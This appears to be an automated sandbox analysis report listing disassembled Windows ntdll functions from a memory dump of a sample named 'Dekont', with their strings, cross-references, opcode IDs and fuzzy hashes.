                                  • <unknown>, xrefs: 01088D2E, 01088D81, 01088E00, 01088E49, 01088EC7, 01088F3E
                                  • an invalid address, %p, xrefs: 01088F7F
                                  • *** enter .cxr %p for the context, xrefs: 01088FBD
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01088FEF
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01088DC4
                                  • The instruction at %p referenced memory at %p., xrefs: 01088EE2
                                  • The critical section is owned by thread %p., xrefs: 01088E69
                                  • This failed because of error %Ix., xrefs: 01088EF6
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01088F3F
                                  • a NULL pointer, xrefs: 01088F90
                                  • *** then kb to get the faulting stack, xrefs: 01088FCC
                                  • The instruction at %p tried to %s , xrefs: 01088F66
                                  • read from, xrefs: 01088F5D, 01088F62
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: 47518ebbd41eee58e07984f8583aaef0a535637cbe4c9bf57f766b9c8269c2c4
                                  • Instruction ID: f07ec6de1db050e9d6bd760cf9a66d5b4400e6b9b4dd962b3fbc37239a11ce6a
                                  • Opcode Fuzzy Hash: 47518ebbd41eee58e07984f8583aaef0a535637cbe4c9bf57f766b9c8269c2c4
                                  • Instruction Fuzzy Hash: F9817675A04202BFCB15BB188D46EAB3F71EF56B90F008089F6C46F292E3B58541DB63
                                  Function 01052349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: 8a76e84d9940bdf6735a16bd299af915a8792f193c4b283ea20ee60700c6a900
                                  • Instruction ID: acb8ae99b44ed87d50483593f321727367019e95be08cbff7d5fde9b35816aaa
                                  • Opcode Fuzzy Hash: 8a76e84d9940bdf6735a16bd299af915a8792f193c4b283ea20ee60700c6a900
                                  • Instruction Fuzzy Hash: 95927A71608342EBE7A1DF28C881B6BBBE8BF84754F04482DFAD597251D774E844CB92
                                  Function 01008620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                  Download Yara Rule
                                  Strings
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010454E2
                                  • Critical section address., xrefs: 01045502
                                  • Address of the debug info found in the active list., xrefs: 010454AE, 010454FA
                                  • Critical section address, xrefs: 01045425, 010454BC, 01045534
                                  • 8, xrefs: 010452E3
                                  • undeleted critical section in freed memory, xrefs: 0104542B
                                  • corrupted critical section, xrefs: 010454C2
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010454CE
                                  • Thread identifier, xrefs: 0104553A
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0104540A, 01045496, 01045519
                                  • Critical section debug info address, xrefs: 0104541F, 0104552E
                                  • double initialized or corrupted critical section, xrefs: 01045508
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01045543
                                  • Invalid debug info address of this critical section, xrefs: 010454B6
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: d70ec5613edae5a03f6eb4bf796004f3eaa9fd2088dbd9a671914987f543dede
                                  • Instruction ID: 43fdebb1074f23ab34a82380f63b8c95e37dbc8a94df3be37817e1857c713af3
                                  • Opcode Fuzzy Hash: d70ec5613edae5a03f6eb4bf796004f3eaa9fd2088dbd9a671914987f543dede
                                  • Instruction Fuzzy Hash: 1E818CB0A00348EFDB60CF99CC81BAEBBF9BB48B14F248169F545B7280D775A941CB50
                                  Function 010029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 0104259B
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01042624
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01042412
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010422E4
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010424C0
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0104261F
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01042409
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010425EB
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01042498
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01042506
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01042602
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: 39e633867cc00e1a28496d77d19278d05e4960d83cebb826687601b5a4902bfa
                                  • Instruction ID: 7bbccaa3fbc35efc2e7d1e7635681bc2fc725f07725d65d46138775500fe88af
                                  • Opcode Fuzzy Hash: 39e633867cc00e1a28496d77d19278d05e4960d83cebb826687601b5a4902bfa
                                  • Instruction Fuzzy Hash: BE0251F1D042299BEB61DB54CD84BDEB7B8AF44304F0041EAA689A7281DB709FC4CF59
                                  Function 01078B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: 3502af83021f8144ec8b9e320f4944994ce20fd58ba2d81f2177420ac42bf479
                                  • Instruction ID: 038cc8f41a25538c310f1e2988c9802365723446d1d82d5d85c6f97d7a0c0abe
                                  • Opcode Fuzzy Hash: 3502af83021f8144ec8b9e320f4944994ce20fd58ba2d81f2177420ac42bf479
                                  • Instruction Fuzzy Hash: FE51B1B19083099BD325EF18884CBABBBECFF95740F14895EA9D9C3241E774D504CB96
                                  Function 01080274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: 4d9c4ab0929311e4e8a525e7587a1f7e8ad304d3cdd2b68e9bfd5ff5e9bd834f
                                  • Instruction ID: 77fd85cc4059872e4153cd66766c064c15d0fd5eeab5df79ebf2aa1da3966f87
                                  • Opcode Fuzzy Hash: 4d9c4ab0929311e4e8a525e7587a1f7e8ad304d3cdd2b68e9bfd5ff5e9bd834f
                                  • Instruction Fuzzy Hash: 99D10134508682DFDB22EF68C452AAEBBF1FF4A714F088089F5C59B656C739D944DB20
                                  Function 010589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  • VerifierFlags, xrefs: 01058C50
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01058A67
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01058A3D
                                  • HandleTraces, xrefs: 01058C8F
                                  • VerifierDebug, xrefs: 01058CA5
                                  • VerifierDlls, xrefs: 01058CBD
                                  • AVRF: -*- final list of providers -*- , xrefs: 01058B8F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: 021792e704fb3ebff2d8c7c5054a072136b14272b7cd57825fe010a1b68572c4
                                  • Instruction ID: b1ae70181ef49acf31c8c712442d6aa6e9aeb79d16e2ac5e2eacfa3f085df9c9
                                  • Opcode Fuzzy Hash: 021792e704fb3ebff2d8c7c5054a072136b14272b7cd57825fe010a1b68572c4
                                  • Instruction Fuzzy Hash: 3A912471605706DFE361EF2A8C81B5B7BE9AB85B14F05845AFEC16B281D735EC00CBA1
                                  Function 00FDEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: ad7ee26b16ead4f553d10f05b50f740cf4fab3b3fa1f72d8f6bb0ef88c5d0437
                                  • Instruction ID: ca328644ad360ad135218546d4b3e6f7cf891685063ffe0dae68bbc3d1877ae3
                                  • Opcode Fuzzy Hash: ad7ee26b16ead4f553d10f05b50f740cf4fab3b3fa1f72d8f6bb0ef88c5d0437
                                  • Instruction Fuzzy Hash: 27A24A71E056298BDB64DF18CC88BADB7B6AF85314F2442EAD44DAB350DB349E85DF00
                                  Function 010063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: cb0a0a6a5511c5e41c85e890819e51d5e035d753e5573eac4df58fe5419bd85a
                                  • Instruction ID: 53613ed8467daecc8cc80985ab0002dcda35495c57cda6179f9ace6dfbd07d69
                                  • Opcode Fuzzy Hash: cb0a0a6a5511c5e41c85e890819e51d5e035d753e5573eac4df58fe5419bd85a
                                  • Instruction Fuzzy Hash: 35913AB0B003159FEB36DF58DD85BAE7BA2BF40B14F150169E9C0AB2C1DB7A9401CB91
                                  Function 00FC645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01029A01
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010299ED
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01029A2A
                                  • apphelp.dll, xrefs: 00FC6496
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01029A11, 01029A3A
                                  • LdrpInitShimEngine, xrefs: 010299F4, 01029A07, 01029A30
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: b1c750ad9d682518ccfd6be6ba19cbe7696d3136fd68def27dc302eb2a279201
                                  • Instruction ID: fcbac6d934ac20820d53272f07ffed69d4c2d31dbb3e6f4f88a829c03200026c
                                  • Opcode Fuzzy Hash: b1c750ad9d682518ccfd6be6ba19cbe7696d3136fd68def27dc302eb2a279201
                                  • Instruction Fuzzy Hash: CE51BC712083119FE720DB24DD82FAB77E8BB84748F14491DF9C59B1A1DB35E9049B92
                                  Function 01002674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010421BF
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0104219F
                                  • RtlGetAssemblyStorageRoot, xrefs: 01042160, 0104219A, 010421BA
                                  • SXS: %s() passed the empty activation context, xrefs: 01042165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01042178
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01042180
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 74cc44ceb8283ac15bf81bcd6f5d5c3cdd6df6f931e4b9f73961a532becd2122
                                  • Instruction ID: 1785e8776799c569a57ae84a21409fef9f8144ed83419f135388c11878c96e66
                                  • Opcode Fuzzy Hash: 74cc44ceb8283ac15bf81bcd6f5d5c3cdd6df6f931e4b9f73961a532becd2122
                                  • Instruction Fuzzy Hash: 13314B76F4031577F7229A999C89F9F7B78EBA4B80F050069BB4477190D270DA00D7A2
                                  Function 0100C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 010481E5
                                  • LdrpInitializeImportRedirection, xrefs: 01048177, 010481EB
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0100C6C3
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01048181, 010481F5
                                  • Loading import redirection DLL: '%wZ', xrefs: 01048170
                                  • LdrpInitializeProcess, xrefs: 0100C6C4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: e46b0ef1946d58c494fa61900f380f0d4a6a2f4039392341caa1e05095e4d1d7
                                  • Instruction ID: 260578f05662d40e304a5fc9c1a844f3f71089a34794732c9f3d17f9e03e16dd
                                  • Opcode Fuzzy Hash: e46b0ef1946d58c494fa61900f380f0d4a6a2f4039392341caa1e05095e4d1d7
                                  • Instruction Fuzzy Hash: DE3117B17443069FD220EF68DD86E6A77D4FF84B10F054668F9C1AB2D1D624EC04DBA2
                                  Function 0101096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 01012DF0: LdrInitializeThunk.NTDLL ref: 01012DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010D74
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: b7803f04f8d8814c24c6441c98810f914a51d1ea88de18c33f3cd426118ab432
                                  • Instruction ID: 2a7762586fba1895120b72a011376696b0dfffcb8bef93b062569e56d972b619
                                  • Opcode Fuzzy Hash: b7803f04f8d8814c24c6441c98810f914a51d1ea88de18c33f3cd426118ab432
                                  • Instruction Fuzzy Hash: E0427DB5900715DFDB61CF68C880BAAB7F5FF08304F1485A9E989EB245D774AA84CF60
                                  Function 00FDA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: 74d6646b6cca6c7d1b0b96b0ea5cdb0b65f2da2d5ccdfa94e0d48e5a6f16053e
                                  • Instruction ID: 2f7eaede53abe87e17f42d37548ae0f6c794c8175e269a3030efbedeb0c669ed
                                  • Opcode Fuzzy Hash: 74d6646b6cca6c7d1b0b96b0ea5cdb0b65f2da2d5ccdfa94e0d48e5a6f16053e
                                  • Instruction Fuzzy Hash: F4C1CB71108386CFC711CF68C444B6AB7E5BF85704F08886AF8858B361E778CA49EB5B
                                  Function 01008402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 01008591
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01008421
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0100855E
                                  • LdrpInitializeProcess, xrefs: 01008422
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: bde2b339be0362a2e2c4b5fdca58872f31ad1499261445cfd5a6fc31712ac4fe
                                  • Instruction ID: 93c542d3c045a59b47ab5c0022ac236bd280fdcc80dd7cf79948a88a1016bf84
                                  • Opcode Fuzzy Hash: bde2b339be0362a2e2c4b5fdca58872f31ad1499261445cfd5a6fc31712ac4fe
                                  • Instruction Fuzzy Hash: AA919FB1508345AFE722DF65CC81FABBAE8BF84744F40492EF6C492191E739D944CB62
                                  Function 0100273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010421D9, 010422B1
                                  • SXS: %s() passed the empty activation context, xrefs: 010421DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010422B6
                                  • .Local, xrefs: 010028D8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: fbb82689b1a4569ce7e1867508a9b9b4baf25f76ab4bf12243e050912c37f0ac
                                  • Instruction ID: 3180b4c99ad0cf256488af3caba463821a611f20727eee2723e327889e493648
                                  • Opcode Fuzzy Hash: fbb82689b1a4569ce7e1867508a9b9b4baf25f76ab4bf12243e050912c37f0ac
                                  • Instruction Fuzzy Hash: 4AA1D671A01229DFEB65CF58DC88BA9B3B4BF58354F1541E9E988A7291D7309EC0CF90
                                  Function 01004AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01043456
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01043437
                                  • RtlDeactivateActivationContext, xrefs: 01043425, 01043432, 01043451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0104342A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: 723cdc9a74b05b69c78533eea5ac438de7ce1d569f3f9562cf2ec940d3eeaeb0
                                  • Instruction ID: 664e542e4b40e54daaaa8554de17939e9e76b8af22c7bdf579695d79d0fdd7ee
                                  • Opcode Fuzzy Hash: 723cdc9a74b05b69c78533eea5ac438de7ce1d569f3f9562cf2ec940d3eeaeb0
                                  • Instruction Fuzzy Hash: 7B6106B6600B219BE7638F1CC881B6AB7E5AF80B50F148569E9D5DF281CB34F840CB95
                                  Function 00FD64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                  Download Yara Rule
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010310AE
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01031028
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0103106B
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01030FE5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: 585daebd163ce4f24c2034d658ce05d131fe4e813eeff0ccbd2589dd209594fc
                                  • Instruction ID: 600a91e896b0154d03fb2577b69e8b655b4afea7b4b277ec129f99e6b96860ea
                                  • Opcode Fuzzy Hash: 585daebd163ce4f24c2034d658ce05d131fe4e813eeff0ccbd2589dd209594fc
                                  • Instruction Fuzzy Hash: 2871E2B19043059FCB61DF14C885F977BE9AF94764F18046AF8888B28AD738D588DBD2
                                  Function 01004D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01043640, 0104366C
                                  • LdrpFindDllActivationContext, xrefs: 01043636, 01043662
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0104365C
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0104362F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
